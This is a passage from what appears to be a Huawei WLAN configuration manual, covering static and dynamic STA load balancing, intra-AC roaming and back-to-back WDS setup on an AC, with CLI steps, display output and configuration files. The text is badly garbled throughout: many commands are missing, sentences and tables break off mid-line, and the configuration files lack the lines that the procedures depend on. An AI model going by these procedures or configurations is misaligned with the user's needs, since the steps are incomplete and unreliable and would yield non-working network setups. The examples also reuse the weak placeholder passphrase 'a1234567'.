allow the STA to connect to the AP according to a load balancing algorithm.
Static load balancing can be used in scenarios such as conference rooms. For example, if two
APs are deployed in a conference room, you can add the two APs to a load balancing group to
prevent heavy load on a single AP.
Configuration Notes
l Each load balancing group supports a maximum of three APs.
l A load balancing group is a set of radios. A radio can join only one load balancing
group. If dual-band APs are used, traffic is load balanced among APs working on the
same frequency band. That is, a dual-band AP can join two load balancing groups.
l All APs in a load balancing group work on the same frequency band (2.4 GHz or 5
GHz). AP radios in a load balancing group must have different channels configured and
work on different channels.


Configuration.

are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN

As shown in Figure 16-9, the AC connects to the upper layer network and manages the APs
through the access and aggregation switches.
AP area_1 and AP area_2 are deployed in the same conference room. The customer requires
that data traffic be balanced on AP radios to prevent one AP radio from being heavily loaded.
Figure 16-9 Networking diagram for configuring static load balancing
In te rn e t
R o u te r
G E 2 /0 /0
G E 1 /0 /2 VLAN 102
VLAN 102
AC
G E 1 /0 /1
G E 0 /0 /2 VLAN 100
VLAN 100
G E 0 /0 /1 G E 0 /0 /3
VLAN 100 VLAN 100
S w itch A
AP: AP:
a re a _ 1 a re a _ 2
STA STA STA STA

Item Data
server STAs.
IP address 10.23.100.2-10.23.100.254/24
pool for the
APs
IP address 10.23.101.2-10.23.101.254/24
pool for the
STAs

Item Data

of the AC's
source
interface

l Referenced profiles: VAP profile wlan-vap and regulatory domain
profile domain1

profile



security
Static load l Name: wlan-static

balancing l Start threshold for load balancing: 15
group
l Load difference threshold for load balancing: 25%

to go online.
6. Configure static load balancing to prevent one AP from being heavily loaded.

NOTE
During AP deployment, you can manually specify the working channels of the APs according to network
planning or configure the radio calibration function to enable the APs to automatically select the optimal
channels. This example configures the radio calibration function.
Procedure
# Add GE0/0/1 to GE0/0/3 on SwitchA to VLAN 100 (management VLAN).

[HUAWEI] sysname AC
[AC] vlan batch 100

[AC-Vlanif101] quit
[AC-Vlanif102] quit


STAs.


[AC] dhcp enable
[AC-Vlanif100] quit
[AC-Vlanif101] quit


[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit


NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] quit
[AC-wlan-ap-1] quit
nor : normal [2]
----------------------------------------------------------------------------------
-----
Uptime
----------------------------------------------------------------------------------
-----
2S
4S
----------------------------------------------------------------------------------
-----
Total: 2

NOTE

mode to tunnel.
the AP.
Step 6 Configure static load balancing.

# Create the static load balancing group and set the start threshold for static load balancing to
15 and load difference threshold to 25%.
[AC-wlan-view] sta-load-balance static-group name wlan-static //Create load
balancing group wlan-static.
[AC-wlan-sta-lb-static-wlan-static] start-threshold 15 //Set the maximum number
of association requests in a static load balancing group to 15. The default value
is 10.
[AC-wlan-sta-lb-static-wlan-static] gap-threshold 25 //Configure session-based
static load balancing and set the load difference threshold to 25%. The default
value is 20%.
# Add AP area_1 and AP area_2 to the static load balancing group.

[AC-wlan-sta-lb-static-wlan-static] member ap-name area_1 //Add AP area_1 to
load balancing group wlan-static.
[AC-wlan-sta-lb-static-wlan-static] member ap-name area_2
[AC-wlan-sta-lb-static-wlan-static] quit


------------------------------------------------------------------------------
-------
address
------------------------------------------------------------------------------
-------
e019-1dc7-1e08 0 area_1 0/1 2.4G 11n 65/38 -29 101
10.23.101.253
b878-2eb4-2689 1 area_2 0/1 2.4G 11n 78/43 -33 101
10.23.101.254
------------------------------------------------------------------------------
-------
Total: 2 2.4G: 2 5G: 0
l Run the display sta-load-balance static-group name wlan-static command on the AC

to check the static load balancing configuration.
[AC-wlan-view]display sta-load-balance static-group name wlan-static
------------------------------------------------------------

Group name : wlan-static

Load-balance status : balance
Start threshold : 15
Gap threshold(%) : 25
Deny threshold : 3
------------------------------------------------------------
RfID: Radio ID
CurEIRP: Current EIRP (dBm)
Act CH: Actual channel, Cfg CH: Config channel
------------------------------------------------------------
AP ID AP Name RfID Act CH/Cfg CH CurEIRP/MaxEIRP Client
------------------------------------------------------------
0 area_1 0 6/- 20/28 1
0 area_1 1 153/- 29/29 0
1 area_2 0 1/- 20/28 1
1 area_2 1 149/- 29/29 0
------------------------------------------------------------
Total: 4
l When a new STA requests to connect to AP area_1, the AC uses a static load balancing
algorithm to redirect the STA to the AP with a light load based on the configured load
balancing group.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#

#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

#
sysname AC
#
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
#
wlan
%# aes
ssid wlan-net
forward-mode tunnel
sta-load-balance static-group name wlan-static
gap-threshold 25
member ap-name area_1 radio 0
start-threshold 15
radio 0
radio 1
ap-name area_1
ap-group ap-group1
ap-name area_2
ap-group ap-group1

#
return
16.9.3 Example for Configuring Dynamic Load Balancing

Dynamic Load Balancing Overview
STA. When a STA joins the network, the AC adds the APs that report the STA to a load
balancing group, and then uses a load balancing algorithm to determine whether to allow
access from the STA.
Dynamic load balancing applies to high-density wireless environments, such as stadiums and
stations.
Static load balancing supports a limited number of group members, and all members must be
manually added to the group and work on the same frequency band. Dynamic load balancing
overcomes these limitations and can better ensure bandwidth for each STA.
Configuration Notes
l Radio traffic statistics packets are sent and received together with Echo packets. In this
example, traffic-based dynamic load balancing is used. You are advised to set the
CAPWAP heartbeat detection interval to 30s to 60s so that the radio traffic statistics can
be updated in a timely manner.


Configuration.

are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN

As shown in Figure 16-10, the AC connects to the upper layer network and manages the APs
through the access and aggregation switches.
AP area_1 and AP area_2 are deployed in the same conference room. The customer requires
that data traffic be balanced on AP radios to prevent one AP radio from being heavily loaded.
Figure 16-10 Networking diagram for configuring dynamic load balancing
In te rn e t
R o u te r
G E 2 /0 /0
G E 1 /0 /2 VLAN 102
VLAN 102
AC
G E 1 /0 /1
G E 0 /0 /2 VLAN 100
VLAN 100
G E 0 /0 /1 G E 0 /0 /3
VLAN 100 VLAN 100
S w itch A
AP: AP:
a re a _ 1 a re a _ 2
STA STA STA STA

Item Data
server STAs.
IP address 10.23.100.2-10.23.100.254/24
pool for the
APs
IP address 10.23.101.2-10.23.101.254/24
pool for the
STAs

Item Data

of the AC's
source
interface

l Referenced profiles: VAP profile wlan-vap, regulatory domain profile
domain1, 5G radio profile radio5g, and 2G radio profile radio2g

profile



security

profile l Referenced profile: RRM profile loadbalance-dynamic

profile l Referenced profile: RRM profile loadbalance-dynamic
RRM l Name: loadbalance-dynamic

profile l Start threshold for dynamic load balancing: 15
l Load difference threshold for dynamic load balancing: 25%


to go online.
6. Configure dynamic load balancing to prevent one AP from being heavily loaded.
NOTE
During AP deployment, you can manually specify the working channels of the APs according to network
planning or configure the radio calibration function to enable the APs to automatically select the optimal
channels. This example configures the radio calibration function.
Procedure

[HUAWEI] sysname AC
[AC] vlan batch 100

[AC-Vlanif101] quit
[AC-Vlanif102] quit



STAs.
[AC] dhcp enable
[AC-Vlanif100] quit
[AC-Vlanif101] quit


[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit


NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] quit
[AC-wlan-ap-1] quit
nor : normal [2]
----------------------------------------------------------------------------------
-----
Uptime
----------------------------------------------------------------------------------
-----
2S
4S
----------------------------------------------------------------------------------
-----
Total: 2

NOTE

mode to tunnel.
the AP.
Step 6 Configure dynamic load balancing.

# Create the RRM profile loadbalance-dynamic and enable dynamic load balancing in the
RRM profile loadbalance-dynamic and set the start threshold for dynamic load balancing to
15 and load difference threshold to 25%.
[AC-wlan-view] rrm-profile name loadbalance-dynamic
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic enable
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic start-threshold
15
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic gap-threshold 25
[AC-wlan-rrm-prof-loadbalance-dynamic] quit
# Create the 2G radio profile radio2g and bind the RRM profile loadbalance-dynamic to the
2G radio profile.
[AC-wlan-radio-2g-prof-radio2g] rrm-profile loadbalance-dynamic
# Create the 5G radio profile radio5g and bind the RRM profile loadbalance-dynamic to the
5G radio profile.
[AC-wlan-radio-5g-prof-radio5g] rrm-profile loadbalance-dynamic
# Bind the 5G radio profile radio5g and 2G radio profile radio2g to the AP group ap-
group1.




------------------------------------------------------------------------------
-------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN
IP address
------------------------------------------------------------------------------
-------
e019-1dc7-1e08 0 area_1 0/1 2.4G 11n 65/38 -29 101
10.23.101.253
b878-2eb4-2689 1 area_2 0/1 2.4G 11n 78/43 -33 101
10.23.101.254
------------------------------------------------------------------------------
-------
Total: 2 2.4G: 2 5G: 0
l Run the display rrm-profile name loadbalance-dynamic command on the AC to check

the dynamic load balancing configuration.
[AC-wlan-view] display rrm-profile name loadbalance-dynamic
------------------------------------------------------------
Auto channel select : enable
Auto transmit power select : enable
PER threshold for trigger channel/power select(%) : 60
Airtime fairness schedule : disable
Dynamic adjust EDCA parameter : disable
UAC check client's SNR : disable
UAC client's SNR threshold(dB) : 20
UAC check client number : disable
UAC client number access threshold : 64
UAC client number roam threshold : 64
UAC check channel utilization : disable
UAC channel utilization access threshold : 80
UAC channel utilization roam threshold : 80
UAC hide SSID : disable
Band steer deny threshold : 2
Band balance start threshold : 10
Band balance gap threshold(%) : 20
Client's band expire based on continuous probe counts : 35
Station load balance : enable
Station load balance start threshold : 15
Station load balance gap threshold(%) : 25
Station load balance deny threshold : 3
Smart-roam : disable
Smart-roam check SNR : enable
Smart-roam standing SNR threshold(dB) : 20
Smart-roam SNR quick-kickoff-threshold(dB) : 15
Smart-roam check rate : disable
AMC policy : auto-balance
Smart-roam rate threshold(%) : 20
Smart-roam rate quick-kickoff-threshold(%) : 20
Smart-roam high level SNR margin(dB) : 15
Smart-roam low level SNR margin(dB) : 6
Smart-roam SNR check interval(s) : 3
Smart-roam unable roam client expire time(m) : 120
------------------------------------------------------------
l Run the display station load-balance sta-mac e019-1dc7-1e08 command on the AC to

check AP radios participating in dynamic load balancing.
[AC-wlan-view] display station load-balance sta-mac e019-1dc7-1e08
Station load balance status: balance
------------------------------------------------------------------------------
AP name Radio ID
------------------------------------------------------------------------------
area_1 1
area_1 0
area_2 1
area_2 0
------------------------------------------------------------------------------
Total: 2

l When a new STA requests to connect to AP area_1, the AC uses a dynamic load
balancing algorithm to redirect the STA to the AP with a light load according to the
information reported by APs.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

#
sysname AC
#
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101

ip address 10.23.101.1 255.255.255.0

dhcp select relay
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
#
wlan
%# aes
ssid wlan-net
forward-mode tunnel
rrm-profile name loadbalance-dynamic
sta-load-balance dynamic enable
sta-load-balance dynamic start-threshold 15
sta-load-balance dynamic gap-threshold 25
rrm-profile loadbalance-dynamic
rrm-profile loadbalance-dynamic
radio 0
radio 1
ap-name area_1
ap-group ap-group1
ap-name area_2
ap-group ap-group1
#
return

16.10.1 Example for Configuring Intra-AC Roaming
WLAN Roaming Overview


service experience.
Configuration Notes
Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
A small enterprise needs to provide WLAN services for employees. Since the WLAN needs
to cover only a small area, one AC is deployed to manage APs. To differentiate department
management, employees are assigned different subnets by department. The enterprise expects
that users can move within the enterprise with nonstop service transmission.
As shown in Figure 16-11, an AC provides services for enterprise employees. It connects to

AP_1 and AP_2 through Switch_1 and Switch_2 respectively.

Figure 16-11 Configuring intra-AC roaming
In te rn e t
AC
G E 0 /0 /1 G E 0 /0 /2
G E 0 /0 /2 G E 0 /0 /2
S w itch _ 1 S w itch _ 2
G E 0 /0 /1 G E 0 /0 /1
AP_1 AP_2
Roam
STA STA
M anagem ent VLAN: VLAN 100

Data planning
Item Data
DHCP The AC functions as a DHCP server to assign IP addresses to the STAs and
server APs.
IP address 10.23.100.2-10.23.100.254/24
pool for the
APs
IP address 10.23.101.2-10.23.101.254/24
pool for the
STAs

interface
address

l Referenced profile: VAP profile wlan-vap1 and regulatory domain
profile domain
Regulatory l Name: domain

profile


Item Data

VAP profile l Name: wlan-vap1

security
CAPWAP packets.
APs.
3. Configure basic WLAN services so that users can connect to the wireless network.
Procedure
Step 1 Configure the switches and the AC so that the AC can communicate with the APs.
#On Switch_1, create VLAN 100 (management VLAN). Add GE0/0/1 connected to AP_1
and GE0/0/2 connected to AC to VLAN 100.
[Switch_1] vlan batch 100
# On Switch_2, create VLAN 100 (management VLAN). Add GE0/0/1 connected to AP_2
and GE0/0/2 connected to AC to VLAN 100.
[Switch_2] vlan batch 100

# On the AC, add GE0/0/1 connected to Switch_1 and GE0/0/2 connected to Switch_2 to
VLAN 100.
[HUAWEI] sysname AC
# Configure the AC as the DHCP server to allocate IP addresses to APs from the IP address
pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101 and VLANIF 102.
[AC] dhcp enable
[AC-Vlanif100] ip address 10.23.100.1 255.255.255.0
[AC-Vlanif100] quit
[AC-Vlanif101] ip address 10.23.101.1 255.255.255.0
[AC-Vlanif101] quit
Step 3 Configure the APs to go online.

# Create AP groups ap-group1.
[AC] wlan
the profile to the AP groups.
[AC-wlan-view] regulatory-domain-profile name domain
[AC-wlan-regulate-domain-domain] country-code cn
[AC-wlan-regulate-domain-domain] quit
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain
e?[Y/N]:y

# Import APs offline on the AC and add APs to AP group ap-group1. Assume that the type of
AP_1 and AP_2 is AP6010DN-AGN and their MAC addresses are 60de-4476-e360 and dcd2-
fc04-b500 respectively.
NOTE
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1.
[AC] wlan


[AC-wlan-ap-0] ap-name ap1
[AC-wlan-ap-0] quit
[AC-wlan-ap-1] ap-name ap2
[AC-wlan-ap-1] quit
# After the APs are powered on, run the display ap all command to check the AP state. If the
State field displays nor, the APs have gone online.
nor : normal [2]
----------------------------------------------------------------------------------
----
Uptime
----------------------------------------------------------------------------------
----
0 60de-4476-e360 ap1 ap-group1 10.23.100.254 AP6010DN-AGN nor 0
15S
1 dcd2-fc04-b500 ap2 ap-group1 10.23.100.253 AP6010DN-AGN nor 0
10S
----------------------------------------------------------------------------------
----
Total: 2
Step 4 Configure basic WLAN services on the AC.
NOTE

[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes
# Create VAP profiles wlan-vap1, set the data forwarding mode and service VLANs, and
apply the security profile wlan-security and SSID profile wlan-ssid to the VAP profiles.
[AC-wlan-vap-prof-wlan-vap1] forward-mode tunnel
# Bind VAP profile wlan-vap1 to AP group ap-group1, and apply the VAP profiles to radio 0
and radio 1 of the APs.



The AC automatically delivers WLAN service configuration to the APs. After the service
configuration is complete, run the display vap ssid wlan-net command to check VAP
information. If Status in the command output is displayed as ON, the VAPs have been
successfully created on AP radios.
WID : WLAN ID
----------------------------------------------------------------------------------
----
AP ID AP name RfID WID BSSID Status Auth type STA
SSID
----------------------------------------------------------------------------------
----
0 ap1 0 1 60DE-4476-E360 ON WPA2-PSK 0
wlan-net
0 ap1 1 1 60DE-4476-E370 ON WPA2-PSK 0
wlan-net
0 ap2 0 1 DCD2-FC04-B500 ON WPA2-PSK 0
wlan-net
0 ap2 1 1 DCD2-FC04-B510 ON WPA2-PSK 0
wlan-net
----------------------------------------------------------------------------------
-----
Total: 2
In the coverage area of AP_1, connect the STA to the wireless network with SSID wlan-net
and enter the password a1234567. After the STA successfully associates with the network,
run the display station ssid wlan-net command on the AC. The command output shows that
the STA with MAC address e019-1dc7-1e08 has associated with AP_1.
----------------------------------------------------------------------------------
--
address
----------------------------------------------------------------------------------
--
e019-1dc7-1e08 0 ap1 1/1 5G 11n 46/59 -57 101
10.23.101.254
----------------------------------------------------------------------------------
--
Total: 1 2.4G: 0 5G: 1
When the STA moves from the coverage area of AP_1 to that of AP_2, run the display
station ssid wlan-net command on AC. The command output shows that the STA has
associated with AP_2.
----------------------------------------------------------------------------------
--
address
----------------------------------------------------------------------------------
--

e019-1dc7-1e08 1 ap2 1/1 5G 11n 46/59 -58 101

10.23.101.254
----------------------------------------------------------------------------------
--
Total: 1 2.4G: 0 5G: 1
Run the display station roam-track sta-mac e019-1dc7-1e08 command on AC to check the
STA roaming track.
[AC-wlan-view] display station roam-track sta-mac e019-1dc7-1e08
Access SSID:wlan-net
------------------------------------------------------------------------------
L2/L3 AC IP AP name Radio ID
BSSID TIME In/Out RSSI Out Rx/Tx
------------------------------------------------------------------------------
-- 10.23.100.1 ap1 1
60de-4476-e360 2016/02/07 17:48:30 -57/-58 46/65
L2 10.23.100.1 ap2 1
dcd2-fc04-b500 2016/02/07 17:54:50 -58/- -/-
------------------------------------------------------------------------------
Number: 1
----End
Configuration Files
#
sysname Switch_1
#
vlan batch 100
#
#
#
return

#
sysname Switch_2
#
vlan batch 100
#
#
#
return

#
sysname AC
#
#
dhcp enable
#

interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
#
#
#
#
wlan
security wpa2 psk pass-phrase %^%#]:krYrz_r<ee}|Cq@9V(W{ZD$"\-R-HD_y.4#U4,%^
%# aes
ssid wlan-net
forward-mode tunnel
regulatory-domain-profile name domain
regulatory-domain-profile domain
radio 0
radio 1
ap-name ap1
ap-group ap-group1
ap-id 1 ap-mac dcd2-fc04-b500
ap-name ap2
ap-group ap-group1
#
return

WDS Technology
WDS Overview
A wireless distribution system (WDS) connects two or more wired or wireless LANs using
wireless links to establish a large network.
On a traditional WLAN network, APs connect to an AC through wired uplinks. However,
wired connections are difficult or costly to implement in some areas such as tunnels and
docks. WDS technology can be used in these areas to connect APs to an AC using wireless
links. This technology facilities WLAN deployment in complex geographical environments,
reduces network deployment cost, allows flexible networking, and makes the network easy to
expand.
APs on a WDS network work in any of the following modes:

l Root: A root AP connects to an AC using a wired link and connects to a middle or leaf
AP using an uplink wireless link.
l Middle: A middle AP is an intermediate node between an upstream root AP and a
downstream leaf AP. It connects to the root and leaf APs using wireless links.
l Leaf: A leaf AP connects to a root or middle AP using an uplink wireless link.
Configuration Notes
with each other.
NOTE
AP4030DN, AP4130DN, AP9131DN, AP9132DN, AP6050DN, AP6150DN, AP7050DE, AP7050DN-
E, AP4030TN, AP4050DN-E, and AP4050DN-HD are 802.11ac APs.
l When planning a WDS network, pay attention to the following:
– The back-to-back WDS networking involves two WDS networks. A single WDS
network cannot form a back-to-back WDS network.
– Only one root node exists on the WDS network.
– A middle node sets up WDS links only with the leaf node and root node. Middle
nodes do not set up WDS links between each other.
– Each WDS link allows a maximum of three hops (a 3-hop WDS link includes a root
node, a middle node, and a leaf node).
– Each node on the WDS link supports a maximum of six subnodes.


are
Versi
on
V200 S12700 V200R007C00:

R009C AP6010SN-GN, AP6010DN-AGN, AP6510DN-
00 AGN, AP6610DN-AGN, AP7110SN-GN,
AP7110DN-AGN, AP5010SN-GN, AP5010DN-
AGN, AP3010DN-AGN, AP5030DN, AP5130DN,
AP6150DN, AP7050DE, AP7050DN-E,
AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20:
AP6010SN-GN, AP6010DN-AGN, AP6510DN-
V200R006C10:
AP8130DN, AP8030DN, AP4030DN, AP4130DN
An enterprise has three areas: Area A, Area B, and Area C. In the office environment, AP_1
in Area A can be connected to the AC through a network cable; AP_2 and AP_3 in Area B
can be connected through a cable but cannot be connected to the AC in wired mode; Area C is
near Area B but AP_4 in Area C cannot be connected to the AC through a network cable
either. The enterprise requires that APs be connected to each other in back-to-back WDS
mode and go online on the AC to provide network services for STAs in VLAN 101, as shown
in Figure 16-12:

Figure 16-12 Networking for configuring back-to-back WDS
Data Planning
Before configuring the WDS service, determine the types and MAC addresses of the APs
used as WDS bridges. The following table provides the data plan for this example.
NOTE

AP Type MAC
AP_1 AP6010DN-AGN 60de-4474-9640
AP_2 AP6010DN-AGN dcd2-fc04-b500
AP_3 AP6010DN-AGN dcd2-fcf6-76a0
AP_4 AP6010DN-AGN 60de-4476-e360


Item Data
VLAN Management VLAN: VLAN 100

of the AC's
source
interface
WDS l wds-net1 (WDS profile used by AP_1): WDS mode root, referenced
profile WDS whitelist wds-list1, permitting access only from AP_2
l wds-net2 (WDS profile used by AP_3): WDS mode root, referenced
WDS whitelist wds-list2, permitting access only from AP_4
l wds-net3 (WDS profile used by AP_2 and AP_4): referencing no WDS
whitelist
WDS role l AP_1: root

l AP_2: leaf
l AP_3: root
l AP_4: leaf
WDS name wds-net
WDS l wds-list1: contains MAC address of AP_2 and is bound to AP_1.

whitelist l wds-list2: contains MAC address of AP_4 and is bound to AP_3.
Radio used Radio 1 (AP_1 and AP_2):

by WDS l Bandwidth: 40mhz-plus
l Channel: 157
l Radio coverage distance parameter: 4 (unit: 100 m)
Radio 1 (AP_3 and AP_4):
l Bandwidth: 40mhz-plus
l Channel: 149
Security l Name: wds-sec

l Password type: PASS-PHRASE

Item Data
AP group l wds-root1: AP_1

l wds-root2: AP_3
l wds-leaf1: AP_2
l wds-leaf2: AP_4. If the wired interface of AP_4 is connected to a Layer
2 network, a wired port profile needs to the configured for AP_4.
Therefore, AP_2 and AP_4 are added to two separate AP groups.
1. Configure WDS links in Area A and Area B so that AP_1 and AP_2 can go online on the
AC.
2. Configure Switch_C to enable AP_2 and AP_3 to communicate through the wired
network.
3. Configure WDS links in Area B and Area C so that AP_4 can go online on the AC.
Procedure
Step 1 Configure the AC to communicate with AP_1 and AP_2 to communicate with AP_3.
# Configure access switch Switch_B. Add GE0/0/1 of Switch_B to VLAN 100 (management
VLAN) and set the PVID of the interface to VLAN 100. Configure GE0/0/1 and GE0/0/2 to
allow packets from VLAN 100 and VLAN 101 to pass through.
[Switch_B] vlan batch 100 to 101
[Switch_B] interface gigabitEthernet 0/0/1
[Switch_B-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_B-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101
[Switch_B-GigabitEthernet0/0/1] port-isolate enable
[Switch_B-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 to 101
# Configure aggregation switch Switch_A. Configure GE0/0/1 to allow packets from VLAN
100 and VLAN 101 to pass through, GE0/0/2 to allow packets from VLAN 100 to pass
through, and GE0/0/3 to allow packets from VLAN 101 to pass through.
[Switch_A] vlan batch 100 to 101
[Switch_A] interface gigabitEthernet 0/0/1
[Switch_A-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101


# Configure GE1/0/1 of the AC to allow packets from VLAN 100 to pass through.
[HUAWEI] sysname AC
# Configure access switch Switch_C. Configure GE0/0/1 and GE0/0/2 to allow packets from
the service and management VLANs to pass through.
[HUAWEI] sysname Switch_C
[Switch_C] vlan batch 100 to 101
[Switch_C] interface gigabitEthernet 0/0/1
[Switch_C-GigabitEthernet0/0/1] port link-type trunk
[Switch_C-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 101
[Switch_C-GigabitEthernet0/0/1] quit
[Switch_C] interface gigabitEthernet 0/0/2
[Switch_C-GigabitEthernet0/0/2] port link-type trunk
[Switch_C-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 to 101
[Switch_C-GigabitEthernet0/0/2] quit
Step 2 Configure Switch_A to assign IP addresses to STAs and the AC to assign IP addresses to APs.
# Configure Switch_A as a DHCP server to assign IP addresses to STAs from an interface

address pool.
[Switch_A] dhcp enable

[Switch_A] interface vlanif 101
[Switch_A-Vlanif101] ip address 10.23.101.1 24
[Switch_A-Vlanif101] dhcp select interface
[Switch_A-Vlanif101] quit
# Enable the DHCP function on the AC to allow it to assign IP addresses to APs from an
interface address pool.
[AC] dhcp enable
[AC-Vlanif100] quit
Step 3 Configure the AP groups, country code, and AC's source interface.
# Create AP group wds-root1 and AP group wds-root2 for root APs and AP group wds-leaf1
and AP group wds-leaf2 for leaf APs.
[AC] wlan
[AC-wlan-view] ap-group name wds-root1
[AC-wlan-ap-group-wds-root1] quit
[AC-wlan-view] ap-group name wds-leaf1
[AC-wlan-ap-group-wds-leaf1] quit


[AC-wlan-ap-group-wds-root1] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-ap-group-wds-root2] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-ap-group-wds-leaf1] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-ap-group-wds-leaf2] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-view] quit

# Add AP_1 to AP group wds-root1, AP_3 to AP group wds-root2, AP_2 to AP group wds-
leaf1, and AP_4 to AP group wds-leaf2.
NOTE
[AC] wlan
[AC-wlan-ap-1] ap-name AP_1
[AC-wlan-ap-1] ap-group wds-root1
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] ap-group wds-leaf1
[AC-wlan-ap-2] quit
[AC-wlan-view] ap-id 3 ap-mac dcd2-fcf6-76a0
[AC-wlan-ap-3] ap-group wds-root2
[AC-wlan-ap-3] quit
[AC-wlan-ap-4] ap-group wds-leaf2


[AC-wlan-ap-4] quit
Step 4 Configure WDS service parameters.
# Configure radio parameters for WDS nodes. This example uses radio 1 of the AP6010DN-
AGN. coverage distance indicates the radio coverage distance parameter. By default, the
radio coverage distance parameter is 3 (unit: 100 meters). In this example, the radio coverage
distance parameter is set to 4. You can configure the parameter according to actual situations.
[AC-wlan-ap-group-wds-root1] radio 1
[AC-wlan-group-radio-wds-root1/1] channel 40mhz-plus 157 //Configure the
channel and bandwidth for WDS links. All WDS links on the same WDS network must
be configured with the same channel and bandwidth.
[AC-wlan-group-radio-wds-root1/1] coverage distance 4 //After the radio
coverage distance parameter is configured based on distances between APs, the APs
will automatically adjust the values of slottime, acktimeout, and ctstimeout
based on the configured distance parameter.
[AC-wlan-group-radio-wds-root1/1] quit
[AC-wlan-group-radio-wds-root2/1] channel 40mhz-plus 149
[AC-wlan-group-radio-wds-root2/1] coverage distance 4
[AC-wlan-ap-group-wds-leaf1] radio 1
[AC-wlan-group-radio-wds-leaf1/1] channel 40mhz-plus 157
[AC-wlan-group-radio-wds-leaf1/1] coverage distance 4
[AC-wlan-group-radio-wds-leaf1/1] quit
[AC-wlan-ap-group-wds-leaf2] radio 1
[AC-wlan-group-radio-wds-leaf2/1] channel 40mhz-plus 149
[AC-wlan-group-radio-wds-leaf2/1] coverage distance 4
[AC-wlan-group-radio-wds-leaf2/1] quit
# Configure the security profile wds-sec used by WDS links. The wds-sec uses the security
policy WPA2+PSK+AES.
[AC-wlan-view] security-profile name wds-sec
[AC-wlan-sec-prof-wds-sec] security wpa2 psk pass-phrase a1234567 aes
[AC-wlan-sec-prof-wds-sec] quit
# Configure a WDS whitelist. Configure the WDS whitelist wds-list1 bound to AP_1 to
permit access only from AP_2. Configure the WDS whitelist wds-list2 bound to AP_3 to
permit access only from AP_4.
[AC-wlan-view] wds-whitelist-profile name wds-list1
[AC-wlan-wds-whitelist-wds-list1] peer-ap mac dcd2-fc04-b500
[AC-wlan-wds-whitelist-wds-list1] quit
[AC-wlan-view] wds-whitelist-profile name wds-list2
[AC-wlan-wds-whitelist-wds-list2] peer-ap mac 60de-4476-e360
[AC-wlan-wds-whitelist-wds-list2] quit
# Configure the WDS profile wds-net1. Set the WDS name to wds-net and WDS mode to
root. Apply the security profile wds-sec and allow packets from service VLAN 101 to pass
through in tagged mode.
[AC-wlan-view] wds-profile name wds-net1
[AC-wlan-wds-prof-wds-net1] wds-name wds-net //Only WDS VAPs with the same
WDS name can set up WDS links.
[AC-wlan-wds-prof-wds-net1] wds-mode root

[AC-wlan-wds-prof-wds-net1] security-profile wds-sec

[AC-wlan-wds-prof-wds-net1] vlan tagged 101
[AC-wlan-wds-prof-wds-net1] quit
root. Apply the security profile wds-sec and allow packets from service VLAN 101 to pass
through in tagged mode.
[AC-wlan-wds-prof-wds-net2] wds-name wds-net
[AC-wlan-wds-prof-wds-net2] wds-mode root
leaf. Bind the security profile wds-sec to the WDS profile, allowing packets from service
VLAN 101 to pass through in tagged mode.
[AC-wlan-wds-prof-wds-net3] wds-name wds-net
[AC-wlan-wds-prof-wds-net3] wds-mode leaf
# Bind the WDS whitelist wds-list1 to radio 1 in AP group wds-root1 to permit access only
from AP_2. Bind the WDS whitelist wds-list2 to radio 1 in AP group wds-root2 to permit
access only from AP_4.
